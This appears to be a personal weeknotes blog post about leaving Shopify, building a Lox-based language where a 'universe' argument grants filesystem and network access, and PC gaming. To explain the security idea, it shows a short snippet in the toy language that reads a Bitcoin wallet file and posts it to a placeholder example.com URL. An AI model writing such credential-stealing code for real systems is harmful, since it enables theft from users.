Weeknotes 2022 W22: Resignation

May 30​–​June 5, 2022
1100 words

The most important news first: I have resigned from Shopify. This month, June, will be my last, and because I’m taking up my remaining vacation days, I’ll be at Shopify for only two-and-a-half more weeks.

I might elaborate on my reasons for leaving Shopify in the future, if and when I feel like it.


No gremlins this time, but other people have reported their technology acting up. Perhaps I’ve infected them.


I keep on working on my variant of Lox (from the Crafting Interpreters book). It is evolving, and the programming language needs a new name — it really is no longer Lox.

I compared the performance of the tree-walking interpreter and the VM, and the difference is astounding: for a Fibonacci implementation, the VM was about 60 times faster. That’s huge.

You might be asking why I am working on my own programming language and a compiler and VM for it. A good question, though not easy to answer. The way I see it:

For this programming language, I also have one very specific goal in mind. It is to answer this question: What if a programming language truly had no globals — and that includes the filesystem and the network?

What I’m thinking about is a language where the external world (the “universe”) is passed in as an argument to the main function, and nothing else has access to this universe:

fun __main__(universe) {
  universe.stdout.println("Hello, world!");
}

There is no global stdout object. There are no global printf() or puts() functions. To write to standard out, you need a reference to that stdout object, which can only come from the universe parameter of the main function:

fun say_hi(stdout) {
  stdout.println("Hi there");
}

fun __main__(universe) {
  say_hi(universe.stdout);
}

Here, say_hi() can write to standard out, because stdout got passed in.

Passing around dependencies like this makes code look more convoluted, but it has the huge advantage that dependencies are explicit. I can tell what effects a function can have simply by looking at its parameters. If the filesystem isn’t passed in as an argument to a function, that function simply cannot access the filesystem.

This is an excellent property from a security point of view: external packages don’t have free reign over the network and filesystem, and can’t do nasty things like steal bitcoin wallets or steal AWS credentials.

I could write a Bitcoin-stealing script:

fun __main__(universe) {
  var wallet = universe.filesystem.read(
    "~/.bitcoin/wallet.dat",
  );

  universe.http.post(
    "https://example.com/steal-ur-coins",
    wallet,
   );
}

… but a third-party package wouldn’t be able to do that behind my back, because it’d have access to neither universe.filesystem nor universe.http.

A third-party package could request you to pass in universe (or parts of it, like filesystem) but that should be a red flag. In most modern programming languages, you’re effectively passing in universe to every function, implicitly.

Furthermore, if a function requires access to the filesystem, you could pass in a read-only filesystem proxy instead, or a filesystem that is scoped to a particular directory, effectively creating a sandbox. Not only is this good from a security point of view, it also greatly improves testability.

This universe would provide access to the network, the filesystem, environment variables, sources of randomness, command-line arguments, the current date and time, the current geo-location, and more.

These ideas are worth exploring, but require an entire new programming language. These ideas cannot be retrofitted into an existing language.

See also: A globally available filesystem is a security liability.


Let’s talk entertainment!

I upgraded my gaming PC, and it’s working very smoothly.

I was initially disappointed as I fired up Cyberpunk 2077 and it was running at only about 20 frames per second. Then I realized that it reset itself to the highest graphics settings, and ray tracing turned all the way up to ultra — but with that configuration, it’s amazing it even runs at 20fps!

Though with settings tuned to more reasonable levels, Cyberpunk 2077 occasionally still slows down to about 5 frames per second. It’s a very buggy game, still.

In other gaming news, I bought the Destiny 2 Witch Queen expansion. Destiny 2 looks amazing yet runs super smooth. Gameplay-wise, I feel like I’ve not quite understood how to play it well. Too many different buttons to press and too many complicated screens! I’m getting there, though. I’m looking forward to doing more co-operative multiplayer.

I picked up Satisfactory again, which runs a lot better after the gaming PC upgrade. I’m not particularly good at it, but I like the creativity that goes into it. I get to design factories! It’s all about esthetics!


Links:

It wouldn’t be me if I didn’t include any cryptocurrency articles:

You can reply to this weeknotes entry by email. I’d love to hear your thoughts!
If you like what I write, stick your email address below and subscribe. I send out my weeknotes every Sunday morning. Alternatively, subscribe to the web feed.